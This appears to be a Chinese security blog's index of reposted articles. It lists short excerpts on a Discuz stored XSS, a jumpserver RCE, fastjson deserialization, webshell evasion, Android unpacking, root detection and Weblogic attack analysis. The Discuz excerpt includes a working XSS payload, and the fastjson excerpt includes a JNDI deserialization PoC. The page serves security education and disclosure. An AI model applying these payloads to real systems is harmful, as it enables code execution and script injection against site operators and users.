DiscuzX3.2最新版存储型XSS分析(直接打首页)

DiscuzX3.2最新版存储型XSS分析(直接打首页)
最近在测试我司的某个业务,发现了多处XSS,并且在SRC上被外界白帽子爆出很多处反射型XSS与存储型XSS,所以根据现有的常用DZ版本进行了一次分析,先引带一下以前wooyun上某人的漏洞,下面是截取的某位总结的Discuz给二次开发所挖的4大坑: 好吧,废话不多说,下面是回顾以前所分析的DiscuzX系列的存储型XSS: 首先发表帖子,在帖子内容里面提交payload: [align="onmouseover="alert(1)] 发表帖子后在...
2018年04月27日 文章转载 暂无评论 喜欢 2 阅读 3,951 views 次 阅读全文

jumpserver最新re-auth复现(伪随机经典案例)

jumpserver最新re-auth复现(伪随机经典案例)
0x00 前言 最近edwardz(彭博)提交了个jumpserver的未授权rce,可以说是非常精彩,复现下来后发现确实是一个很经典的伪随机例子,这也是我一直想写但是找不出合适例子做教学的一套组合拳,现在正好借这个漏洞来写一写。 0x01 前置知识 在讲具体漏洞之前,我们先要了解一下伪随机数的概念。什么是伪随机数呢?在C语言或者其他类似语言里,经常会看到类似的代码: 这里其实就是基础的随机数的使用,一般是先...
2023年09月28日 文章转载 暂无评论 喜欢 0 阅读 3,950 views 次 阅读全文

密码保护:fastjson =< 1.2.47 反序列化漏洞浅析

密码保护:fastjson =< 1.2.47 反序列化漏洞浅析
poc {"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}}} 最近据说爆出来一个在hw期间使用的fastjson 漏洞,该漏洞无需开启autoType即可利用成功,建议使用fastjson的用户尽快升级到> 1.2.47版本(保险起见,建议升级到最新版) 环境准备 阅读本篇文章之...
2019年07月11日 文章转载 要查看留言请输入您的密码。 喜欢 2 阅读 3,894 views 次 阅读全文

PHP 从零学习到 Webshell 免杀手册

PHP 从零学习到 Webshell 免杀手册
作者:曾哥 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:[email protected] 一、PHP相关资料 PHP官方手册: https://www.php.net/manual/zh/ PHP函数参考: https://www.php.net/manual/zh/funcref.php 菜鸟教程: https://www.runoob.com/php/php-tutorial.html w3school: https://www.w3school.com.cn/php/index.asp 渊龙Sec安全团队导航: https://dh.aabyss.cn 开...
2023年10月10日 文章转载 暂无评论 喜欢 0 阅读 3,824 views 次 阅读全文

RealWorld|应急引发的规模性红队反制案例

RealWorld|应急引发的规模性红队反制案例
作者:狗哥、Superdong、Dm、主任 说明 本文未有过多的技术细节,主要讲述了近期在某省级攻防演练中因一个电话引起的一次日行千里的应急事件,以及如何溯源反制某公司既当裁判又当红队的安服人员,进而引发如何批量反制攻击手。 01 事件详情 晚上突然接到客户的电话,说在攻防演练期间被打的很惨,需要回血和加分。由于时间紧迫,无法第一时间赶到现场,于是先远程登录到涉事的服务器进行简单的排查。确定...
2023年10月08日 文章转载 暂无评论 喜欢 0 阅读 3,782 views 次 阅读全文

安卓的脱壳之战-邦邦脱壳

安卓的脱壳之战-邦邦脱壳
那么前面已经讲了腾讯和360的加固了,不知道有多少小伙伴学会了,今天我们继续讲解邦邦加固的壳! 废话不多说,开始今天的教程,这次准备的软件是在我亲戚家的小儿子上面看到的一款软件,名为:“小学语文数学英语同步”的APP! 准备的软件依旧是: 反射大师+MT管理器+虚拟大师 首先在本地查看安装包,可以看到是梆梆加固 接下来开始脱壳,脱壳的方法和360加固、腾讯加固一样,熟手直接下滑跳过这部分!我们打...
2021年02月02日 文章转载 暂无评论 喜欢 3 阅读 3,770 views 次 阅读全文

安卓root检测常见手段

安卓root检测常见手段
一、root检测常见手段 1.目录特征遍历 我们来看段检测代码,从代码中可以看会去遍历"/sbin/su", "/system/bin/su", "/system/sbin/su", "/system/xbin/su" 等目录其次检测magsik、SuperSU等特征。 2.尝试执行root后的一些操作 对特定目录尝试新建文件例如 /data、/system、/etc 等(只有root后才有权限操作的目录),或者去执行典型的,例如su,还有find、mount等命令。 3.读取手机编译版本、调试状态...
2023年10月07日 文章转载 暂无评论 喜欢 0 阅读 3,754 views 次 阅读全文

XSS原理分析与绕过总结

XSS原理分析与绕过总结
一、原理 该文章仅用于信息防御技术教学,请勿用于其他用途。 1、XSS原理 XSS(跨站脚本攻击)是一种常见的网络安全漏洞,攻击者通常会在网页中插入恶意的 JavaScript 代码。由于服务器对输入数据的过滤和验证不严格,这些恶意的 JavaScript 代码会被当作响应的一部分返回给客户端。当浏览器解析来自服务器的响应时,它会执行这些恶意的 JavaScript 代码,从而导致攻击者能够执行恶意操作。 二、解析及其...
2023年10月08日 文章转载 暂无评论 喜欢 0 阅读 3,743 views 次 阅读全文

基于攻击流量和日志对Weblogic各类漏洞的分析思路

基于攻击流量和日志对Weblogic各类漏洞的分析思路
    前言 在最近的几次应急响应中,基于Weblogic反序列化漏洞的攻击是非常常见的攻击手段,于是在应急响应结束之余我希望将实战中的一些分析经验和思路进行总结,提炼出一套Weblogic类漏洞攻击的分析思路和方法。在这篇文章中,我将跟大家总结Weblogic日志基础知识,以及如何利用Weblogic攻击流量和日志深度分析和挖掘Weblogic的4种漏洞攻击场景。   一、“九层之台起累土”— Weblogic环境...
2019年04月04日 文章转载 暂无评论 喜欢 1 阅读 3,742 views 次 阅读全文